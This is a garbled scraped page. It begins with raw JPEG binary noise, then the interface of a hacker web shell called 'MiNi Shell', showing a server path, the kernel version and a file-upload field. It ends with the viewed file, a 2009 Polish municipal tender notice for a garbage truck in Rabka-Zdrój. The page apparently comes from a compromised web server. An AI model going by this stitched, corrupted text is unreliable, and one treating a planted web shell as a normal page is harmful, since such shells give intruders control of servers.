JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090518/154048-N-2009.html

<p class="kh_header"><b>Rabka-Zdrój: ZAMAWIAJĄCY:
Zakłady Komunalne Sp.z o.o.
ul. Kilińskiego 46 b
34-700 Rabka-Zdrój

Zakup i dostawa  samochodu  śmieciarki do wywozu odpadów komunalnych stałych</b><br>
<b>Numer ogłoszenia: 154048 - 2009; data zamieszczenia: 18.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta  Rabka-Zdrój , ul. Parkowa 2, 34-700 Rabka-Zdrój, woj. małopolskie, tel. 018 2676440, 2677178.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rabka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAMAWIAJĄCY:
Zakłady Komunalne Sp.z o.o.
ul. Kilińskiego 46 b
34-700 Rabka-Zdrój

Zakup i dostawa  samochodu  śmieciarki do wywozu odpadów komunalnych stałych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup i dostawa  samochodu  śmieciarki do wywozu odpadów komunalnych stałych,
2.	Szczegółowy opis  przedmiotu zamówienia 

I    Podwozie -parametry techniczne bezwzględnie  wymagane
1.	moc silnika pojazdu  minimum 100 KM ,
2.	masa całkowita  nie większa niż 3,5 tony,
3.	długość pojazdu około  5800mm,
4.	szerokość pojazdu  około  2 100mm,
5.	wysokość pojazdu  około 2 600mm,
6.	rozstaw osi nie większy niż 3500mm,
7.	silnik  wysokoprężny ,spełniający  wymagania  EURO 4 ,
8.	pojemność silnika   powyżej 2000 cm 3,
9.	skrzynia biegów 6-biegowa,zsynchronizowana,
10.	zawieszeni mechaniczne,
11.	układ napędowy 4x4,
12.	oś tylna  wyposażona w koła bliźniacze ,
13.	koła  z ogumieniem nie mniejszym niż R 16, 
14.	kabina 3 miejscowa,
15.	wspomagania układu kierowniczego,
16.	pojazd wyposażony w światła  ostrzegawcze zgodnie z wymaganymi przepisami .

     II. Zabudowa -parametry techniczne bezwzględnie wymagane
1.	przeznaczona do wywozu odpadów stałych,
2.	przeznaczona do kontenerów od 110 do 240 litrów,
3.	pojemność skrzyni ładunkowej  nie mniejsza niż 5 m 3,
4.	zagęszczenie  śmieci  od  2 do 5  w zależności od rodzaju,
5.	sposób ugniatania odpadów-hydrauliczny płytowy ,praca płyty  na całej długości  zbiornika zasypowego,
6.	konstrukcja  kontenera  stalowa wzmocniona ożebrowaniem,
7.	boczne okna umożliwiające  opróżnianie koszy ulicznych,
8.	tylna klapa  mocowana  za pomocą  górnych zawiasów i dolnych zamknięć,
9.	uszczelka gumowa na tylnej klapie,
10.	 mechanizm sterowania  zagęszczania ręczny,
11.	mechanizm  załadunku kontenerów  hydrauliczny  boczny,
12.	okno wsypowe zabezpieczone  bocznymi ekranami  uniemożliwiającymi  wydostawanie się śmieci  na zewnątrz ,
13.	podnoszenie  pojemników na stalowej prowadnicy  przez siłowniki hydrauliczne,
14.	docisk pojemników  na prowadnicy hydrauliczny ,
15.	wyładunek śmieci poprzez płytę wypychającą,
16.	kolor skrzyni  ładunkowej -2011(pomarańcz) 

III.  Zamawiający  wymaga, aby:
1.	podwozie oraz zabudowa  były fabrycznie nowe,
2.	wykonawca udzielił na przedmiot zamówienia  bezwarunkowej gwarancji jakości -24 miesiące licząc od daty  odbioru zamówienia(data protokołu zdawczo-odbiorczego),
3.	w wypadku zgłoszonej przez  zamawiającego nieprawidłowości  w funkcjonowaniu przedmiotu zamówienia Wykonawca podjął  działania zmierzające  do usunięcia ewentualnych  nieprawidłowości  w funkcjonowaniu  przedmiotu zamówienia  w terminie  max.24 godzin od chwili jej zgłoszenia  za pośrednictwem faxu.Pod pojęciem podjąć  działania Zamawiający rozumie  stawienie się w siedzibie Zamawiającego  wyspecjalizowanego pracownika  Wykonawcy w celu zdiagnozowania i usunięcia  tej nieprawidłowości.
4.	w przypadku  nieprawidłowości  w funkcjonowaniu  przedmiotu zamówienia  trwającej dłużej niż  72 godziny(licząc od momentu jej zgłoszenia),Wykonawca podstawił nieodpłatnie pojazd zastępczy  o takich samych parametrach lub lepszy do siedziby Zamawiającego,
5.	usługi serwisowe odbywały się w granicach administracyjnych Miasta  Rabka-Zdrój,
6.	W przypadku, gdy usługi serwisowe będą świadczone  poza granicami administracyjnymi Miasta  Rabka-Zdrój Wykonawca pokrył koszty transportu pojazdu związane z ww. usługą  z i do siedziby zamawiającego
   IV.  Ponadto do przedmiotu zamówienia  i obowiązków  Wykonawcy należy
1.	nieodpłatnie pełnienie   przez wykonawcę  przeglądów gwarancyjnych,
2.	dostarczanie homologacji lub dopuszczanie  pojazdu do ruchu drogowego( w dacie  odbioru przedmiotu zamówienia),
3.	dostarczanie  instrukcji obsługi pojazdu (podwozia oraz zabudowy)  w języku polskim  w dniu dostawy przedmiotu zamówienia,
4.	zapewnienie bezpłatnego szkolenia  dla pracowników  obsługujących  pojazdy oraz osprzęt w zakresie  montażu  uruchomienia,eksploatacji  i konserwacji .Szkolenie odbędzie się w siedzibie zamawiającego,
5.	dostawa przedmiotu zamówienia  na koszt i staranie  Wykonawcy w miejsce wskazane przez Zamawiającego ,
6.	Uruchomienie przedmiotu zamówienia na miejscu dostawy,
7.	przeprowadzenie  próbnej jazdy  w siedzibie Zamawiającego,
8.	dostarczenie narzędzi  potrzebnych do montażu lub konserwacji  dostarczonego przedmiotu zamówienia,
9.	dostarczenie książki gwarancyjnej przedmiotu zamówienia,DTR,katalogu części zamiennych,instrukcji  dla mechaników i elektryków zawierających schematy elektryczne,hydrauliczne i mechaniczne, 
10.	przeprowadzanie konserwacji i napraw lub sprawowanie  nadzoru  nad prowadzeniem  konserwacji i napraw  dostarczonego Przedmiotu  Zamówienia, w uzgodnionych okresach . Przeprowadzenie  konserwacji i napraw nie zwalnia Wykonawcy od obowiązków wynikających z rękojmi lub gwarancji jakości..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 34.22.30.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Warunkiem przystąpienia  do przetargu jest wniesienie  wadium przetargowego.
2.	Wadium, w zależności   od woli  Wykonawcy może być wniesione  w jednej lub w kilku formach określonych  w art.45 ust.6 ustawy  Pzp. Tj. może być wnoszone w:
1)	pieniądzu,
2)	poręczeniach bankowych  lub poręczeniach  spółdzielczej kasy oszczędnościowo-kredytowej ,z tym ,że poręczenie kasy jest zawsze poręczeniem  pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielonych przez podmioty,o których mowa  w art.6 b ust.5 pkt.2 ustawy  9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 ,poz.1158 wraz z późniejszymi zmianami) 
6)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego  nr 65  88150002 0000 0015 6390 0002  w terminie do dnia  26 maja  2009r do godz.11 oo oznaczenie sprawy ZK/ZP/1/2009
7)	O terminowym  wniesieniu wadium zdecyduje data wpływu  wadium na rachunek  Zamawiającego .Przelew  winien być dokonany w terminie gwarantującym wpływ  wadium na konto Zamawiającego  w terminie określonym powyżej.
8)	Potwierdzeniem tej formy wniesienia wadium będzie kopia przelewu załączona do oferty.
9)	Wadium  wnoszone w pozostałych  formach winno być dostarczone  w formie  oryginału  do siedziby Zakładów Komunalnych Spółka z o.o.   Rabka-Zdrój 
     ul. Kilińskiego 46b (kasa)  w terminie określonym powyżej .Potwierdzeniem wniesienia  tej formy wadium będzie  dołączona do oferty  kserokopia dokumentu stanowiącego wadium potwierdzona za zgodność z  orginałem przez Wykonawcę.
10)	Oferta nie zabezpieczona  w wymaganym terminie  wadium ,spowoduje, że Wykonawca zostanie wykluczony  z przedmiotowego postępowania .
11)	Zwrot i zatrzymanie  wadium  następuje na warunkach określonych  w art.46 Ustawy Pzp.
12)	Wysokość wadium przetargowego 3000,00 zł(słownie:trzy tysiące złotych 00/100 PLN )  w terminie wyszczególnionym  w ust.6  niniejszego rozdziału  SIWZ powyżej.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	udzielenie zamówienia mogą  ubiegać się Wykonawcy ,którzy spełniają  warunki określone w Art.22 ust.1 pkt.1-3 Wykonawcy którzy złożą ofertę wspólną i spełnią warunki  w art.23 Ustawy Pzp. 
Wykonawcy nie wykluczeni z postępowania  na podstawie art.24 ust.1 i 2 Ustawy  Pzp,w szczególności.
1)	Zgodnie  z art.24 ust.1 wyklucza się z postępowania:
a)	Wykonawców, którzy w ciągu ostatnich trzech lat przed wszczęciem postępowania wyrządzili  szkodę nie wykonując zamówienia lub wykonując je nienależycie ,a szkoda ta nie została  dobrowolnie naprawiona  do dnia wszczęcia postępowania chyba ,że niewykonanie lub nienależyte wykonanie jest następstwem okoliczności ,za które Wykonawca  nie ponosi  odpowiedzialności.
b)	Wykonawców ,w stosunków do których  otwarto likwidację lub, których upadłość ogłoszono z wyjątkiem Wykonawców ,którzy po ogłoszeniu  upadłości  zawarli układ  zatwierdzony prawomocnym postanowieniem sądu ,jeżeli układ nie przewiduje  zaspokojenia wierzycieli  poprzez likwidację majątku upadłego.
c)	Wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne ,z wyjątkiem przypadków ,gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie ,rozłożenie na raty zaległych płatności  lub wstrzymanie w  całości  wykonania decyzji właściwego organu;
d)	Osoby fizyczne ,które prawomocnie skazano za przestępstwo popełnione w związku  z postępowaniem o udzielenie zamówienia ,przestępstwo przeciwko prawom osób wykonujących prace zarobkową popełnione w celu  osiągnięcia korzyści majątkowych ,a także za przestępstwo  skarbowe lub przestępstwo udziału w zorganizowanej grupie  albo związku mających na celu popełnienie  przestępstwa lub przestępstwa skarbowego;
e)	Spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w  związku  z postępowaniem  o udzielenie zamówienia , przestępstwo przeciwko prawom osób  wykonujących prace zarobkową , przestępstwo przekupstwa, przestępstwo  przeciwko obrotowi gospodarczemu lub inne przestępstwo  popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe  lub przestępstwo  udziału w zorganizowanej grupie   albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego.
f)	Spółki partnerskie ,których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku  z postępowaniem o udzielenie zamówienia , przestępstwo przeciwko prawom osób wykonujących prace zarobkową ,przestępstwo przekupstwa ,przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych ,a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
g)	Spółki komandytowe  oraz spółki komandytowo-akcyjne, których komplementariusza prawo mocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia ,przestępstwo przeciwko prawom osób  wykonujących prace zarobkowe ,przestępstwo przekupstwa ,przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwa popełnione w celu osiągnięcia korzyści  majątkowych ,a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo w związku mających  na celu popełnienie przestępstwa lub przestępstwa skarbowego;
h)	Osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem udzielenie zamówienia ,przestępstwo przeciwko  prawom osób wykonujących  prace zarobkowe ,przestępstwo przekupstwa ,przestępstwo przeciwko obrotowi  gospodarczemu lub inne przestępstwo  popełnione w  celu osiągnięcia korzyści majątkowych ,a także za  przestępstwo skarbowe  lub przestępstwo udziału  w zorganizowanej grupie  albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego.
i)	Podmioty zbiorowe ,wobec których sąd orzekł  zakaz ubiegania się o zamówienia, na podstawie przepisów o odpowiedzialności podmiotów zbiorowych pod groźbą kary;
j)	Wykonawców ,którzy nie spełniają warunków  udziału w postępowaniu ,o których mowa w art.22 ust.1 pkt.1-3.
2)	wg art.24 ust.2.wyklucza się z postępowania Wykonawców, którzy;
a)	Wykonywali bezpośredni czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się  w celu sporządzenia oferty  osobami uczestniczącymi w dokonywaniu tych czynności ,chyba,że udział tych wykonawców  w postępowaniu nie utrudni uczciwej konkurencji;
b)	Złożyli nieprawdziwe informacje  mające wpływ na wynik prowadzonego postępowania ;
c)	Nie złożyli oświadczenia  o spełnieniu warunków udziału w postępowaniu  lub dokumentów potwierdzających  spełnienie tych warunków lub złożone dokumenty zawierają błędy z zastrzeżeniem art.26 ust.3 Ustawy Pzp.
d)	Wykonawców którzy nie wnieśli wadium,w tym również  na przedłużony okres związania ofertą.
2.	Do niniejszego postępowania przetargowego mogą  przystąpić wyłącznie Wykonawcy                        spełniający warunki,o których mowa  w art.22 ust.1 Ustawy Pzp oraz pozostałe warunki  określone w niniejszej specyfikacji  istotnych warunków zamówienia.
3.	Wykonawcy występujący  wspólnie ponoszą solidarną odpowiedzialność  za wykonanie umowy i wniesienie zabezpieczenia  należytego wykonania  umowy .Wykonawcy ustanawiają  pełnomocnika do reprezentowania  w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego. Przepisy dotyczące Wykonawcy stosuje się  odpowiednio do wykonawców występujących wspólnie.
VII.	WARUNKI UDZIAŁU WYKONAWCÓW W POSTĘPOWANIU
1.	Wykonawcy muszą posiadać uprawnienia do wykonywania  określonej działalności lub czynności objętych przedmiotem niniejszego postępowania zgodnie z wymaganiami ustawowymi.
2.	Wykonawcy muszą posiadać niezbędną wiedzę  i doświadczenie -charakteryzujące się wykonaniem  w ciągu ostatnich  3 lat przed dniem wszczęcia postępowania (lub w okresie  prowadzenia działalności ,jeżeli jest on krótszy niż ostatnie trzy lata);co najmniej 5 dostaw odpowiadającym swoim rodzajom  przedmiotowi zamówienia  o wartości (bez podatku VAT) każdej z wymienionej dostaw stanowiącej co najmniej równowartość oferowanej wartości dostawy.
3.	Wykonawcy muszą znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1)	Przychód osiągnięty przez wykonawcę  zgodnie z załącznikiem nr 3
2)	Wykonawca posiada na rachunku bankowym środki finansowe  lub że wykonawca posiada zdolność kredytową na kwotę nie niższą od wartości składanej oferty.
4.	Wykonawcy muszą zadeklarować ,iż wykonają przedmiot zamówienia w terminach wymaganych przez Zamawiającego wyszczególnionych powyżej w Rozdziale V SIWZ.
5.	Wykonawcy muszą posiadać polisę lub inny dokument  ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony  od odpowiedzialności  cywilnej  w zakresie prowadzonej  działalności gospodarczej  w kwocie nie mniejszej  niż oferowana cena ofertowa za wykonanie przedmiotu  zamówienia.
6.	Wykonawca oświadcza ,iż oferowany przedmiot zamówienia posiada wszystkie cechy zgodne z wymogami Zamawiającego określonymi w rozdziale III niniejszej SIWZ
7.	Wykonawcy oświadczą, że udzielą na przedmiot zamówienia gwarancji jakości zgodnych z wymaganiami Zamawiającego opisanymi w rozdziale III niniejszej SIWZ,
8.	Wykonawcy nie mogą podlegać wykluczeniu z postępowania na podstawie art.24 ust.1 i ust.2  ustawy Pzp.
9.	Wykonawcy muszą złożyć w ofercie  wszystkie wymagane  przez zamawiającego  oświadczenia, informacje  dokumenty opracowania szczegółowo opisane  w rozdziale VIII niniejszej SIWZ .Oświadczenia i informacje winny być zawarte  w formularzu oferty i załącznikach do oferty sporządzonych  ściśle  wg załączonych do niniejszej specyfikacji  wzorów.
10.	Ocena spełnienia wyżej wymienionych warunków  zostanie dokonana zgodnie z formułą spełnia-nie spełnia Podstawę oceny stanowić będą  informacje zawarte  w dokumentach i oświadczeniach  wyszczególnione  w rozdziale  VIII niniejszej SIWZ.Z treści załączonych  dokumentów  musi wynikać jednoznacznie ,iż Wykonawca spełnił ww. warunki.
11.	Nie spełnienie  chociażby jednego z ww. warunków skutkować będzie wykluczeniem wykonawcy  z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Na potwierdzenie spełniania warunków udziału w postępowaniu  Zamawiający 
            Wymaga złożenia przez Wykonawcę  w ofercie oświadczeń ,dokumentów  
             Szczegółowo wymienionych i opisanych w ust.3 niniejszego rozdziału  SIWZ.
2.Oferta przedłożona przez Wykonawcę winna być sporządzona zgodnie z otrzymanym  od Zamawiającego  kompletem dokumentacji przetargowej ,a także powinna obejmować kompletny przedmiot zamówienia. 
2.	Oferta winna zawierać  wszystkie wymagane  dokumenty i oświadczenia, które powinny być właściwie podpisane i opieczętowane  przez osoby uprawnione do reprezentowania Wykonawcy ,w szczególności ;
1)	Wypełniony czytelnie ,podpisany i opieczętowany Formularz oferty-załącznik do SIWZ.
2)	W celu potwierdzenia ,że wykonawca posiada uprawnienia do wykonania określonej działalności  lub czynności oraz, że nie podlega  wykluczeniu na podstawie  art.24 Ustawy pzp Wykonawca jest zobowiązany  do złożenia  w ofercie  następujących dokumentów i oświadczeń:;
a)	Oświadczenie o spełnieniu warunków uczestnictwa w przetargu  zgodnie z art.22 ust.1 pkt.1-4 Ustawy Pzp,wg treści załącznika nr 1 do SIWZ.
b)	Aktualny dokument rejestracyjny  firmy Wykonawcy ,tj. aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej -za aktualny będzie uważany dokument  wystawiony nie wcześniej  ni ż 6 miesięcy  przed upływem terminu składania ofert .W zależności od osobowości firmy jest to;
	odpis z rejestru handlowego  lub w przypadku  zarejestrowania firmy Wykonawcy w rejestrze przedsiębiorców  Krajowego Rejestru Sądowego kserokopia odpisu z KRS,
	W przypadku osób fizycznych  prowadzących działalność  gospodarczą  oraz dotychczasowych spółek  zaświadczenie o wpisie każdego ze wspólników do ewidencji działalności gospodarczej.
c)	Aktualne zaświadczenie właściwego naczelnika  Urzędu Skarbowego potwierdzające,że Wykonawca  nie zalega z opłaceniem podatków i opłat bądź  w przypadku ,kiedy Wykonawca uzyskał na to  przewidzianą prawem zgodę ,właściwy dokument  stwierdzający o zwolnieniu ,odroczeniu lub rozłożeniu na raty  zaległych płatności .Za ważne będzie uznane  zaświadczenie  wystawione ,przez US nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
d)	Aktualne zaświadczenie  z Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia  Społecznego potwierdzające, że Wykonawca nie zalega z opłatą  na ubezpieczenie zdrowotne  i społeczne bądź w przypadku ,kiedy uzyskał na to przewidzianą prawę zgodę ,właściwy dokument  stwierdzający o zwolnieniu ,odroczeniu lub rozłożeniu na raty zaległych płatności .Za ważne będzie uznane zaświadczenie wystawione przez ZUS lub KRUS nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
e)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym,w art.24 ust.1 pkt.4-8  Ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
f)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym, w art.24 ust.1 pkt.9 Ustawy ,wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)	W celu potwierdzenia ,że Wykonawca posiada niezbędną wiedzę oraz doświadczenie ,Wykonawca jest zobowiązany  do złożenia w ofercie  następujących  dokumentów i oświadczeń:
a)	Dane  finansowe,opracowane  treści załącznika nr 3 do SIWZ,
b)	Części  sprawozdania finansowego  za rok 2008 tj.rachunek zysków i strat  za 2008 r.W przypadku  Wykonawców nie zobowiązanych  do sporządzania sprawozdania  finansowego innych  dokumentów określających  obroty oraz zobowiązania  i należności za rok 2008 ,a jeżeli okres prowadzonej działalności  jest krótszy-za ten okres.
c)	Informacja banku lub spółdzielczej kasy oszczędnościowej -kredytowej ,w którym wykonawca posiada rachunek ,potwierdzająca  wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy wystawiona nie wcześniej  niż 3 miesiące przed upływem terminu składania ofert.
d)	Polisa lub inny dokument ubezpieczenia potwierdzający ,że wykonawca jest ubezpieczony  od odpowiedzialności  cywilnej w zakresie prowadzonej działalności  gospodarczej.
4)	Inne dokumenty,formularze,oświadczenia ,niezbędne do prawidłowej oceny i wyboru  najkorzystniejszej oferty.
a)	Tabela  zawierająca wartość netto i ceny brutto poszczególnych elementów  dostaw składających się na przedmiot  zamówienia  oraz określająca cenę ofertową wraz z terminem  dostawy -opracowana wg Załącznika nr 4 do SIWZ;
b)	Deklaracja o udzieleniu gwarancji i warunkach serwisu -opracowana wg. Załącznika nr 6 do SIWZ
c)	Charakterystyka oferowanego pojazdu -opracowana wg. Załącznika  nr 6 do SIWZ.
Uwaga:Jeżeli  charakterystyka ofertowego  przez  Wykonawcę pojazdu oraz osprzętu  będzie odbiegać  od wymagań postawionych  przez zamawiającego  oferta będzie podlegać  odrzuceniu.
5)	Kopia homologacji  dla każdego przedmiotu zamówienia
6)	Zaparafowana na każdej stronie kserokopia wzoru umowy -załącznik nr 7  do SIWZ -parafowaną  na każdej stronie 
Uwaga: Dla zachowania ważności oferty treść projektu  umowy nie może być zmieniona przez  Wykonawcę.
7)	Kserokopia dowodu wniesienia wadium przetargowego.
8)	Zastrzeżenie nie udostępnienia  informację stanowiących tajemnicę przedsiębiorstwa  w rozumieniu przepisów  o zwalczaniu nieuczciwej konkurencji  tj. zgodnie  z definicją art.12 pkt.4 Ustawy  nr 8 do SIWZ . Zamawiający informuje ,że za tajemnice przedsiębiorstwa  nie mogą być uznane  w szczególności:
a)	Aktualny odpis  z właściwego  rejestru firmy Wykonawcy
b)	Informację ujawnione  przez Zamawiającego  w czasie otwarcia  ofert -zgodnie z art.86 ust.4 Ustawy.
Uwaga: Zastrzeżenie  nie udostępnienia informacji stanowiących tajemnicę przedsiębiorstwa innych niż wymienione ww. ustawie o zwalczaniu  nieuczciwej konkurencji  skutkować będzie  odrzuceniem oferty.
